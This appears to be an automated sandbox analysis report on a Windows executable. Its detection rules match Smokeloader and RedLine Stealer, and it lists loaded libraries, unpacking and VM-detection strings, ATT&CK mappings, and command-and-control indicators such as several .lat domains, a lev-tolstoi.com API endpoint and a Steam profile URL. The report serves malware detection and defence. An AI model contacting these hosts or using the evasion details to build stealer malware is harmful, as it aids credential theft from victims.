      Source: unknownHTTPS traffic detected: 172.67.157.254:443 -> 192.168.2.9:49733 version: TLS 1.2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exeCode function: 0_2_004329C0 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,0_2_004329C0

      System Summary

      Source: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
      Source: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: String function: 00724667 appears 65 times
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: String function: 00408030 appears 42 times
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: String function: 00414400 appears 65 times
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: String function: 00718297 appears 72 times
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3440 -s 660
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1372609162.0000000000680000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamesDefence: vs NQbg5Ht2hW.exe
      Source: NQbg5Ht2hW.exe, 00000000.00000000.1363831661.000000000044B000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamesDefence: vs NQbg5Ht2hW.exe
      Source: NQbg5Ht2hW.exe | Binary or memory string: OriginalFilenamesDefence: vs NQbg5Ht2hW.exe
      Source: NQbg5Ht2hW.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: 00000000.00000002.1716969733.0000000000710000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
      Source: 00000000.00000002.1716537575.0000000000470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
      Source: NQbg5Ht2hW.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: classification engine | Classification label: mal100.troj.evad.winEXE@2/5@11/2
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_004707A6 CreateToolhelp32Snapshot,Module32First | 0_2_004707A6
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_00430C70 CoCreateInstance | 0_2_00430C70
      Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3440
      Source: C:\Windows\SysWOW64\WerFault.exe | File created: C:\ProgramData\Microsoft\Windows\WER\Temp\c89904e0-05a0-4b61-8eb5-ada27a915b3d
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: NQbg5Ht2hW.exe | Virustotal: Detection: 41%
      Source: NQbg5Ht2hW.exe | ReversingLabs: Detection: 57%
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | File read: C:\Users\user\Desktop\NQbg5Ht2hW.exe
      Source: unknown | Process created: C:\Users\user\Desktop\NQbg5Ht2hW.exe "C:\Users\user\Desktop\NQbg5Ht2hW.exe"
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: apphelp.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: msimg32.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: msvcr100.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: windows.storage.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: wldp.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: winhttp.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: webio.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: mswsock.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: iphlpapi.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: winnsi.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: sspicli.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: dnsapi.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: rasadhlp.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: fwpuclnt.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: schannel.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: mskeyprotect.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ntasn1.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ncrypt.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ncryptsslp.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: msasn1.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: cryptsp.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: rsaenh.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: cryptbase.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: gpapi.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: dpapi.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: kernel.appcore.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: uxtheme.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Section loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

      Data Obfuscation

      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Unpacked PE file: 0.2.NQbg5Ht2hW.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Unpacked PE file: 0.2.NQbg5Ht2hW.exe.400000.0.unpack
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0043D810 push eax; mov dword ptr [esp], 707F7E0Dh | 0_2_0043D812
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_00443469 push ebp; iretd | 0_2_0044346C
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0044366E push 9F00CD97h; ret | 0_2_004436B1
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0043AE30 push eax; mov dword ptr [esp], 1D1E1F10h | 0_2_0043AE3E
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_004477A5 push ebp; iretd | 0_2_004477AA
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0047582A push ss; retf | 0_2_0047589B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_004758AD push ss; retf | 0_2_0047589B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_004714DC push 00000039h; ret | 0_2_004715B3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_00473480 push ebp; ret | 0_2_00473483
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_00471545 push 00000039h; ret | 0_2_004715B3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0047156B push 00000039h; ret | 0_2_004715B3
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0074B097 push eax; mov dword ptr [esp], 1D1E1F10h | 0_2_0074B0A5
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0074DA77 push eax; mov dword ptr [esp], 707F7E0Dh | 0_2_0074DA79
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_00733A79 push esp; iretd | 0_2_00733A7C
      Source: NQbg5Ht2hW.exe | Static PE information: section name: .text entropy: 7.796934543809841
      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
      Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX
      (the two WerFault.exe entries above are repeated in the report: 5 entries for FAILCRITICALERRORS | NOGPFAULTERRORBOX and 50 entries for NOOPENFILEERRORBOX)
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe TID: 3200 | Thread sleep time: -60000s >= -30000s
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe TID: 3200 | Thread sleep time: -30000s >= -30000s
      Source: Amcache.hve.4.dr | Binary or memory string: VMware
      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual USB Mouse
      Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin
      Source: Amcache.hve.4.dr | Binary or memory string: VMware, Inc.
      Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1hbin@
      Source: Amcache.hve.4.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
      Source: Amcache.hve.4.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
      Source: NQbg5Ht2hW.exe, 00000000.00000003.1445194070.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716905313.000000000068D000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453014795.000000000068B000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1453201659.000000000068C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
      Source: Amcache.hve.4.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
      Source: Amcache.hve.4.dr | Binary or memory string: c:/windows/system32/drivers/vmci.sys
      Source: Amcache.hve.4.dr | Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
      Source: Amcache.hve.4.dr | Binary or memory string: vmci.sys
      Source: Amcache.hve.4.dr | Binary or memory string: vmci.syshbin`
      Source: Amcache.hve.4.dr | Binary or memory string: \driver\vmci,\driver\pci
      Source: Amcache.hve.4.dr | Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
      Source: Amcache.hve.4.dr | Binary or memory string: VMware20,1
      Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
      Source: Amcache.hve.4.dr | Binary or memory string: NECVMWar VMware SATA CD00
      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
      Source: Amcache.hve.4.dr | Binary or memory string: VMware-42 27 c7 3b 45 a3 e4 a4-61 bc 19 7c 28 5c 10 19
      Source: Amcache.hve.4.dr | Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
      Source: Amcache.hve.4.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
      Source: Amcache.hve.4.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
      Source: Amcache.hve.4.dr | Binary or memory string: VMware PCI VMCI Bus Device
      Source: Amcache.hve.4.dr | Binary or memory string: VMware VMCI Bus Device
      Source: Amcache.hve.4.dr | Binary or memory string: VMware Virtual RAM
      Source: Amcache.hve.4.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
      Source: Amcache.hve.4.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0043C1F0 LdrInitializeThunk, | 0_2_0043C1F0
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_00470083 push dword ptr fs:[00000030h] | 0_2_00470083
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_0071092B mov eax, dword ptr fs:[00000030h] | 0_2_0071092B
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Code function: 0_2_00710D90 mov eax, dword ptr fs:[00000030h] | 0_2_00710D90

      HIPS / PFW / Operating System Protection Evasion

      Source: NQbg5Ht2hW.exe | String found in binary or memory: rapeflowwj.lat
      Source: NQbg5Ht2hW.exe | String found in binary or memory: crosshuaht.lat
      Source: NQbg5Ht2hW.exe | String found in binary or memory: sustainskelet.lat
      Source: NQbg5Ht2hW.exe | String found in binary or memory: aspecteirs.lat
      Source: NQbg5Ht2hW.exe | String found in binary or memory: energyaffai.lat
      Source: NQbg5Ht2hW.exe | String found in binary or memory: necklacebudi.lat
      Source: NQbg5Ht2hW.exe | String found in binary or memory: discokeyus.lat
      Source: NQbg5Ht2hW.exe | String found in binary or memory: grannyejh.lat
      Source: NQbg5Ht2hW.exe | String found in binary or memory: sweepyribs.lat
      Source: C:\Users\user\Desktop\NQbg5Ht2hW.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
      Source: Amcache.hve.4.dr | Binary or memory string: msmpeng.exe
      Source: Amcache.hve.4.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
      Source: Amcache.hve.4.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
      Source: Amcache.hve.4.dr | Binary or memory string: MsMpEng.exe

      Stealing of Sensitive Information

      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

      Remote Access Functionality

      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR

      MITRE ATT&CK Matrix (techniques listed per tactic; a leading number is the count of matched signatures for that technique)

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
      Execution: 1 PowerShell; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
      Persistence: 1 DLL Side-Loading; Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Privilege Escalation: 1 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
      Defense Evasion: 1 Virtualization/Sandbox Evasion; 1 Process Injection; 11 Deobfuscate/Decode Files or Information; 4 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading
      Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
      Discovery: 11 Security Software Discovery; 1 Virtualization/Sandbox Evasion; 1 Process Discovery; 2 System Information Discovery; Internet Connection Discovery; Wi-Fi Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
      Collection: 1 Archive Collected Data; 2 Clipboard Data; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
      Command and Control: 11 Encrypted Channel; 1 Ingress Tool Transfer; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
      Antivirus, Machine Learning and Genetic Malware Detection

      Source | Detection | Scanner | Label
      NQbg5Ht2hW.exe | 42% | Virustotal |
      NQbg5Ht2hW.exe | 58% | ReversingLabs | Win32.Trojan.CrypterX
      NQbg5Ht2hW.exe | 100% | Avira | HEUR/AGEN.1306978
      NQbg5Ht2hW.exe | 100% | Joe Sandbox ML |

      No Antivirus matches

      No Antivirus matches

      Source | Detection | Scanner | Label
      sustainskelet.lat | 0% | URL Reputation | safe
      crosshuaht.lat | 0% | URL Reputation | safe
      necklacebudi.lat | 0% | URL Reputation | safe

      No Antivirus matches
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      steamcommunity.com | 23.55.153.106 | true | false | | high
      lev-tolstoi.com | 172.67.157.254 | true | false | | high
      sustainskelet.lat | unknown | unknown | true | 0%, URL Reputation | unknown
      crosshuaht.lat | unknown | unknown | true | 0%, URL Reputation | unknown
      rapeflowwj.lat | unknown | unknown | false | | high
      grannyejh.lat | unknown | unknown | false | | high
      aspecteirs.lat | unknown | unknown | false | | high
      sweepyribs.lat | unknown | unknown | false | | high
      discokeyus.lat | unknown | unknown | false | | high
      energyaffai.lat | unknown | unknown | false | | high
      necklacebudi.lat | unknown | unknown | true | 0%, URL Reputation | unknown
      Name | Malicious | Antivirus Detection | Reputation
      aspecteirs.lat | false | | high
      sweepyribs.lat | false | | high
      sustainskelet.lat | false | | high
      rapeflowwj.lat | false | | high
      https://steamcommunity.com/profiles/76561199724331900 | false | | high
      energyaffai.lat | false | | high
      https://lev-tolstoi.com/api | false | | high
      grannyejh.lat | false | | high
      necklacebudi.lat | false | | high
      crosshuaht.lat | false | | high
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://player.vimeo.com | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://steamcommunity.com/?subsection=broadcasts | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamst | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
      https://community.fastly.steamstatic.com/public/css/promo/summer2017 | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://store.steampowered.com/subscriber_agreement/ | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=hyEE | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      http://www.valvesoftware.com/legal.htm | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://www.youtube.com | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://www.google.com | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&lB | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback | NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6 | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1445042582.0000000000647000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/javascript/jquery-1.11 | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://s.ytimg.com; | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1 | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444948353.00000000006E8000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000002.1716705757.000000000063A000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english& | NQbg5Ht2hW.exe, 00000000.00000002.1716952832.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444874751.00000000006E0000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1452976890.00000000006D3000.00000004.00000020.00020000.00000000.sdmp, NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
      https://community.fastly.steamstatic.com/ | NQbg5Ht2hW.exe, 00000000.00000003.1444978863.00000000006D3000.00000004.00000020.00020000.00000000.sdmp | false | | high
